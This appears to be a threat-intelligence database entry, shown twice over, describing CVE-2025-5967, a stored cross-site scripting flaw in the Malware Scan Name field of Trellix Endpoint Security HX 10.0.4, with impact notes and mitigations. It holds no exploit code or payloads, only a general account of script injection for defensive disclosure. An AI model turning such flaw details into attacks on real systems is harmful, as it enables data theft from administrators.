CVE-2025-5967: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Trellix Endpoint Security HX
A stored cross-site scripting vulnerability in ENS HX 10.0.4 allows a malicious user to inject arbitrary HTML into the ENS HX Malware Scan Name field, resulting in the exposure of sensitive data.
AI Analysis
Technical Summary
CVE-2025-5967 is a stored cross-site scripting (XSS) vulnerability identified in Trellix Endpoint Security HX version 10.0.4. This vulnerability arises due to improper neutralization of input during web page generation (CWE-79), specifically within the Malware Scan Name field of the product. An attacker with high privileges and partial authentication can inject arbitrary HTML or script code into this field, which is then stored and rendered in the application interface. When other users or administrators view the affected interface, the malicious script executes in their browsers, potentially exposing sensitive data or enabling further attacks such as session hijacking or privilege escalation. The vulnerability requires high attack complexity and privileges, and user interaction is needed for exploitation. The CVSS 4.0 base score is 5.3 (medium severity), reflecting these factors. No known exploits are currently reported in the wild, and no patches have been linked yet. The vulnerability affects a security product used for endpoint protection, which is critical infrastructure for organizational cybersecurity. Stored XSS in such a context can undermine trust in security controls and lead to data leakage or manipulation of security events.
Potential Impact
For European organizations, this vulnerability poses a significant risk due to the critical role of endpoint security solutions like Trellix ENS HX in protecting corporate networks and sensitive data. Successful exploitation could lead to exposure of sensitive information, including security event data or user credentials, potentially facilitating lateral movement or further compromise within the network. Given the GDPR and other stringent data protection regulations in Europe, any data leakage could result in regulatory penalties and reputational damage. Additionally, since the vulnerability requires high privileges and user interaction, insider threats or compromised privileged accounts could be leveraged to exploit this flaw. The impact extends beyond confidentiality to integrity and availability, as attackers might manipulate security alerts or configurations, undermining the overall security posture of affected organizations.
Mitigation Recommendations
European organizations using Trellix Endpoint Security HX 10.0.4 should prioritize the following mitigations: 1) Immediately restrict access to the Malware Scan Name field to only the most trusted and necessary personnel to reduce the risk of malicious input. 2) Implement strict input validation and output encoding on the Malware Scan Name field to neutralize any injected scripts, even before vendor patches are available. 3) Monitor logs and user activities for unusual input patterns or unexpected HTML/script content in the application interface. 4) Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts within the application context. 5) Coordinate with Trellix for timely patch deployment once available and verify the patch effectiveness through testing. 6) Conduct user awareness training focused on recognizing suspicious behaviors related to endpoint security management interfaces. 7) Consider network segmentation and least privilege principles to minimize the impact scope if exploitation occurs.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden
CVE-2025-5967: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Trellix Endpoint Security HX
Description
A stored cross-site scripting vulnerability in ENS HX 10.0.4 allows a malicious user to inject arbitrary HTML into the ENS HX Malware Scan Name field, resulting in the exposure of sensitive data.
AI-Powered Analysis
Technical Analysis
CVE-2025-5967 is a stored cross-site scripting (XSS) vulnerability identified in Trellix Endpoint Security HX version 10.0.4. This vulnerability arises due to improper neutralization of input during web page generation (CWE-79), specifically within the Malware Scan Name field of the product. An attacker with high privileges and partial authentication can inject arbitrary HTML or script code into this field, which is then stored and rendered in the application interface. When other users or administrators view the affected interface, the malicious script executes in their browsers, potentially exposing sensitive data or enabling further attacks such as session hijacking or privilege escalation. The vulnerability requires high attack complexity and privileges, and user interaction is needed for exploitation. The CVSS 4.0 base score is 5.3 (medium severity), reflecting these factors. No known exploits are currently reported in the wild, and no patches have been linked yet. The vulnerability affects a security product used for endpoint protection, which is critical infrastructure for organizational cybersecurity. Stored XSS in such a context can undermine trust in security controls and lead to data leakage or manipulation of security events.
Potential Impact
For European organizations, this vulnerability poses a significant risk due to the critical role of endpoint security solutions like Trellix ENS HX in protecting corporate networks and sensitive data. Successful exploitation could lead to exposure of sensitive information, including security event data or user credentials, potentially facilitating lateral movement or further compromise within the network. Given the GDPR and other stringent data protection regulations in Europe, any data leakage could result in regulatory penalties and reputational damage. Additionally, since the vulnerability requires high privileges and user interaction, insider threats or compromised privileged accounts could be leveraged to exploit this flaw. The impact extends beyond confidentiality to integrity and availability, as attackers might manipulate security alerts or configurations, undermining the overall security posture of affected organizations.
Mitigation Recommendations
European organizations using Trellix Endpoint Security HX 10.0.4 should prioritize the following mitigations: 1) Immediately restrict access to the Malware Scan Name field to only the most trusted and necessary personnel to reduce the risk of malicious input. 2) Implement strict input validation and output encoding on the Malware Scan Name field to neutralize any injected scripts, even before vendor patches are available. 3) Monitor logs and user activities for unusual input patterns or unexpected HTML/script content in the application interface. 4) Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts within the application context. 5) Coordinate with Trellix for timely patch deployment once available and verify the patch effectiveness through testing. 6) Conduct user awareness training focused on recognizing suspicious behaviors related to endpoint security management interfaces. 7) Consider network segmentation and least privilege principles to minimize the impact scope if exploitation occurs.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- trellix
- Date Reserved
- 2025-06-10T09:40:39.945Z
- Cvss Version
- 4.0
- State
- PUBLISHED
Threat ID: 686354ef6f40f0eb728e0a94
Added to database: 7/1/2025, 3:24:31 AM
Last enriched: 7/1/2025, 3:39:27 AM
Last updated: 7/1/2025, 5:17:56 AM
Views: 3
Related Threats
CVE-2025-6934: CWE-269 Improper Privilege Management in wpopal Opal Estate Pro – Property Management and Submission
CriticalRCE through Path Traversal
MediumCVE-2025-6081: CWE-522 Insufficiently Protected Credentials in Konica Minolta bizhub 227 Multifunction printers
MediumCVE-2025-6940: Buffer Overflow in TOTOLINK A702R
HighCVE-2025-6939: Buffer Overflow in TOTOLINK A3002RU
HighActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.